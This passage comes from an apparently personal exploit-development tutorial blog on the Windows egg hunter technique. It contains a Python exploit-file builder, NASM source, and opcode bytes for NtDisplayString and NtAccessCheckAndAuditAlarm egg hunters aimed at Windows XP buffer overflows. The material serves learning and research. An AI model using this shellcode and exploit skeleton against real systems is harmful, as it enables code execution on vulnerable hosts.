class="hljs-string">b&quot;\x5a&quot;</span>                   <span class="hljs-comment"># pop edx</span><br>hunter += <span class="hljs-string">b&quot;\x74\xef&quot;</span>               <span class="hljs-comment"># jz to or dx, 0xfff</span><br>hunter += <span class="hljs-string">b&quot;\xb8&quot;</span>                   <span class="hljs-comment"># mov eax,</span><br>hunter += <span class="hljs-string">b&quot;\xDE\xAD\xBE\xEF&quot;</span>       <span class="hljs-comment"># DEADBEEF</span><br>hunter += <span class="hljs-string">b&quot;\x89\xd7&quot;</span>               <span class="hljs-comment"># mov edi, edx</span><br>hunter += <span class="hljs-string">b&quot;\xaf&quot;</span>                   <span class="hljs-comment"># scasd</span><br>hunter += <span class="hljs-string">b&quot;\x75\xea&quot;</span>               <span class="hljs-comment"># jnz to inc edx</span><br>hunter += <span class="hljs-string">b&quot;\xaf&quot;</span>                   <span class="hljs-comment"># scasd</span><br>hunter += <span class="hljs-string">b&quot;\x75\xe7&quot;</span>               <span class="hljs-comment"># jnz to inc edx</span><br>hunter += <span class="hljs-string">b&quot;\xff\xe7&quot;</span>               <span class="hljs-comment"># jmp edi (jump to the egg)</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_dos</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_deadbeef</span>():<br>    <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">make_exploit</span>():<br>    junk = <span class="hljs-string">b&#x27;A&#x27;</span> * RET_OFFSET<br><br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;exploit.txt&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        f.write(EGG_TAG * <span class="hljs-number">2</span>)<br>        f.write(egg_code)<br>        f.write(<span class="hljs-string">b&#x27;\n&#x27;</span>)<br>        f.write(junk)<br>        f.write(RET)<br>        f.write(hunter_ntaccess)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    <span class="hljs-keyword">if</span> args.dos:<br>        make_dos()<br>    <span class="hljs-keyword">elif</span> args.deadbeef:<br>        make_deadbeef()<br>    <span class="hljs-keyword">elif</span> args.exploit:<br>        make_exploit()<br>    <span class="hljs-keyword">else</span>:<br>        args.print_help()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    main()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/10.png'><img src="/images/article/2026-9-12-EggHunter/10.png" width=800/>
</p>

<h1 id="NtAccessCheckAndAuditAlarm"><a href="#NtAccessCheckAndAuditAlarm" class="headerlink" title="NtAccessCheckAndAuditAlarm"></a>NtAccessCheckAndAuditAlarm</h1><p>Using <code>NtAccessCheckAndAuditAlarm</code> is another stable method. It is also introduced by <code>skape</code>.</p>
<p>This method is almost the same as <code>NtDisplayString</code>. The only difference is the Syscall Number.</p>
<p>Using the program that we wrote before to find the Syscall Number of <code>NtAccessCheckAndAuditAlarm</code> on Windows XP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs batch">find_syscall_x86.exe NtAccessCheckAndAuditAlarm<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/11.png'><img src="/images/article/2026-9-12-EggHunter/11.png" width=800/>
</p>

<p>The Syscall Number is <code>0x02</code> (On my Windows XP).</p>
<p>Therefore, we can implement the Hunter code:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-comment">; hunter_ntaccess.asm </span><br><br>[<span class="hljs-meta">BITS</span> <span class="hljs-number">32</span>]<br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_inc_page:</span><br>    <span class="hljs-keyword">or</span> <span class="hljs-built_in">dx</span>, <span class="hljs-number">0x0fff</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_inc_one:</span><br>    <span class="hljs-keyword">inc</span> <span class="hljs-built_in">edx</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_check:</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-built_in">edx</span><br>    <span class="hljs-keyword">push</span> <span class="hljs-number">0x02</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">eax</span><br>    <span class="hljs-keyword">int</span> <span class="hljs-number">0x2e</span><br>    <span class="hljs-keyword">cmp</span> <span class="hljs-built_in">al</span>, <span class="hljs-number">0x05</span><br><br>    <span class="hljs-keyword">pop</span> <span class="hljs-built_in">edx</span><br><span class="hljs-symbol"></span><br><span class="hljs-symbol">loop_check_8_valid:</span><br>    <span class="hljs-keyword">je</span> loop_inc_page<br><span class="hljs-symbol"></span><br><span class="hljs-symbol">is_egg:</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-number">0x50905090</span><br>    <span class="hljs-keyword">mov</span> <span class="hljs-built_in">edi</span>, <span class="hljs-built_in">edx</span><br>    <span class="hljs-keyword">scasd</span><br>    <span class="hljs-keyword">jnz</span> loop_inc_one<br><br>    <span class="hljs-keyword">scasd</span><br><br>    <span class="hljs-keyword">jnz</span> loop_inc_one<br><span class="hljs-symbol"></span><br><span class="hljs-symbol">matched:</span><br>    <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">edi</span><br></code></pre></td></tr></table></figure>
<p>Using <code>xxd -i</code> to obtain the opcode:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">xxd -i hunter_ntaccess.bin<br></code></pre></td></tr></table></figure>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> hunter_ntaccess_bin[] = &#123;<br>  <span class="hljs-number">0x66</span>, <span class="hljs-number">0x81</span>, <span class="hljs-number">0xca</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0x0f</span>, <span class="hljs-number">0x42</span>, <span class="hljs-number">0x52</span>, <span class="hljs-number">0x6a</span>, <span class="hljs-number">0x02</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0xcd</span>, <span class="hljs-number">0x2e</span>,<br>  <span class="hljs-number">0x3c</span>, <span class="hljs-number">0x05</span>, <span class="hljs-number">0x5a</span>, <span class="hljs-number">0x74</span>, <span class="hljs-number">0xef</span>, <span class="hljs-number">0xb8</span>,<br>  <span class="hljs-number">0x90</span>, <span class="hljs-number">0x50</span>, <span class="hljs-number">0x90</span>, <span class="hljs-number">0x50</span>, <span class="hljs-comment">// Tag of the Egg</span><br>  <span class="hljs-number">0x89</span>, <span class="hljs-number">0xd7</span>,<br>  <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xea</span>, <span class="hljs-number">0xaf</span>, <span class="hljs-number">0x75</span>, <span class="hljs-number">0xe7</span>, <span class="hljs-number">0xff</span>, <span class="hljs-number">0xe7</span><br>&#125;;<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-12-EggHunter/12.png'><img src="/images/article/2026-9-12-EggHunter/12.png" width=800/>
</p>

<p>Which can also achieve the same effect!</p>
<h1 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h1><p>In this article, I introduced the concepts behind the egg hunter technique. Its primary purpose is to overcome the problem of insufficient memory space on the stack.</p>
<p>I learned a great deal while developing the shellcode using C++ and NASM.</p>
<p>In the next article, I will demonstrate how to exploit Kolibri v2.0 using the egg hunter technique.</p>
<p>That wraps up this article. If you have any comments or suggestions, please feel free to leave them below!</p>
<h1 id="THANKS-FOR-READING"><a href="#THANKS-FOR-READING" class="headerlink" title="THANKS FOR READING"></a>THANKS FOR READING</h1><p>I drew a <a target="_blank" rel="noopener" href="https://www.pixiv.net/artworks/149596463">new drawing</a>!</p>
<p align="center" class='item-img' data-src='/images/meme/Wallpaper/MyArt/3.png'><img src="/images/meme/Wallpaper/MyArt/3.png" width=800/>
    <figcaption>
    Always be happy!
    </figcaption>
</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/09/11/2026-9-11-Wireshark-SEH-BoF/">[Learning] CVE-2011-1591: Wireshark v1.4.4 RCE — SEH Overflow Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="utterances-sel"></button></div><div id="utterances-container"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/" width="200" id="logo"><img src="https://avatars.githubusercontent.com/u/110074064?v=4" alt="Logo"></a><h1 id="Dr"><a href="/">ISSAC</a></h1><div id="description"><p>Everything is failing...</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/iss4cf0ng/"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/iss4c_f0ng/"><i class="fab fa-twitter" alt="X"></i></a></div><div id="rss-feed"><a class="social" id="rss-copy-button" href="javascript:void(0)" title="Copy RSS link to clipboard"><span>RSS</span></a></div></div><div id="music"></div><div class="music-box"><hr style="border:1px solid #ccc; margin:10px 0"><p class="music-title">Feeling exhausted? Let's enjoy (やさしい) music!</p><p style="text-align:center; position: relative"><img class="music-anime" id="anime-img" src="/images/meme/himari_coffee.2.jpg" width="150" height="200"></p><div style="text-align:center"><button class="music-btn" id="music-prev">⏮</button><button class="music-btn" id="music-toggle">▶ Play Music</button><button class="music-btn" id="music-next">⏭</button></div><div style="margin-top:5px"><span id="music-index"></span></div><hr style="border:1px solid #ccc; margin:10px 0"><audio id="bg-music"><source src="/mp3/music/music_1.mp3" type="audio/mpeg"></audio><script>document.addEventListener("DOMContentLoaded", function () {
  var playlist = [
    "/mp3/music/music_1.mp3",
    "/mp3/music/sugar_story.mp3",
    "/mp3/music/story_music_box.mp3",
    "/mp3/music/last_page.mp3",
    "/mp3/music/sunset_memory.mp3",
    "/mp3/music/welcome_home.mp3",
    "/mp3/music/canon.mp3",
    "/mp3/music/arigadou.mp3",
  ];

  var current = 0;
  const audio = document.getElementById("bg-music");
  const btn = document.getElementById("music-toggle");
  const prevBtn = document.getElementById("music-prev");
  const nextBtn = document.getElementById("music-next");
  const indexDisplay = document.getElementById("music-index");

  function updateDisplay() {
    indexDisplay.innerText = `Currently: ${current + 1} / ${playlist.length}`;
  }

  updateDisplay();

  btn.addEventListener("click", function () {
    if (audio.paused) {
      audio.src = playlist[current];
      audio.play();
      btn.innerText = "⏸ Pause Music";
    } else {
      audio.pause();
      btn.innerText = "▶ Play Music";
    }
  });

  nextBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current = (current + 1) % playlist.length;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  prevBtn.addEventListener("click", function () {
    const wasPlaying = !audio.paused;

    current--;

    if (current < 0)
      current = playlist.length - 1;

    audio.src = playlist[current];
    audio.load();

    if (wasPlaying) {
      audio.play();
    }

    updateDisplay();
  });

  audio.addEventListener("ended", function() {
    current = (current + 1) % playlist.length;
    audio.src = playlist[current];
    audio.play();
    updateDisplay();
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const animeImg = document.getElementById("anime-img");

  animeImg.addEventListener("click", function() {
    
    const tip = document.createElement("div");
    tip.innerText = "?";
    tip.style.position = "absolute";
    tip.style.top = "-50px";
    tip.style.left = "50%";
    tip.style.transform = "translateX(-50%)";
    tip.style.backgroundColor = "#fff";
    tip.style.color = "rgb(16, 174, 11)";
    tip.style.padding = "2px 6px";
    tip.style.border = "1px solid #ccc";
    tip.style.borderRadius = "8px";
    tip.style.boxShadow = "0 3px 6px rgba(0,0,0,0.2)";
    tip.style.fontSize = "50px";
    tip.style.fontWeight = "bold";
    tip.style.zIndex = "1000";
    tip.style.opacity = "1";
    tip.style.transition = "opacity 1s, top 1s";
    
    animeImg.parentElement.appendChild(tip);

    setTimeout(() => {
      tip.style.opacity = "0";
      tip.style.top = "-60px";
      setTimeout(() => tip.remove(), 1000);
    }, 2000);
  });
});
</script><script>document.addEventListener("DOMContentLoaded", function () {
  const rssBtn = document.getElementById("rss-copy-button");

  rssBtn.addEventListener("click", async () => {
    const rssUrl = window.location.origin + "/atom.xml";
    try {
      await navigator.clipboard.writeText(rssUrl);

      const tip = document.createElement("div");
      tip.innerText = "RSS link copied!";
      tip.style.position = "absolute";
      tip.style.top = "-30px";
      tip.style.left = "50%";
      tip.style.transform = "translateX(-50%)";
      tip.style.backgroundColor = "#0d0d0d";
      tip.style.color = "#00fff7";
      tip.style.border = "1px solid #ff00ff";
      tip.style.boxShadow = "0 0 8px #ff00ff, 0 0 16px #00fff7";
      tip.style.padding = "2px 6px";
      tip.style.borderRadius = "8px";
      tip.style.fontSize = "14px";
      tip.style.fontWeight = "bold";
      tip.style.zIndex = "1000";
      tip.style.opacity = "1";
      tip.style.transition = "opacity 1s, top 1s";

      rssBtn.style.position = "relative";
      rssBtn.appendChild(tip);

      setTimeout(() => {
        tip.style.opacity = "0";
        tip.style.top = "-40px";
        setTimeout(() => tip.remove(), 1000);
      }, 2000);

    } catch (err) {
      console.error("Failed to copy: ", err);
    }
  });
});
</script></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Egg-Hunter"><span class="toc-number">2.</span> <span class="toc-text">Egg Hunter</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NtDisplayString"><span class="toc-number">3.</span> <span class="toc-text">NtDisplayString</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x43"><span class="toc-number">3.1.</span> <span class="toc-text">0x43</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#int-0x2e"><span class="toc-number">3.2.</span> <span class="toc-text">int 0x2e</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Why-mov-then-pop"><span class="toc-number">3.3.</span> <span class="toc-text">Why mov then pop?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Why-scasd-for-Twice"><span class="toc-number">3.4.</span> <span class="toc-text">Why scasd for Twice?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Demonstration"><span class="toc-number">3.5.</span> <span class="toc-text">Demonstration</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NtAccessCheckAndAuditAlarm"><span class="toc-number">4.</span> <span class="toc-text">NtAccessCheckAndAuditAlarm</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Conclusion"><span class="toc-number">5.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#THANKS-FOR-READING"><span class="toc-number">6.</span> <span class="toc-text">THANKS FOR READING</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/custom.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script src="/js/slide.js"></script></body></html>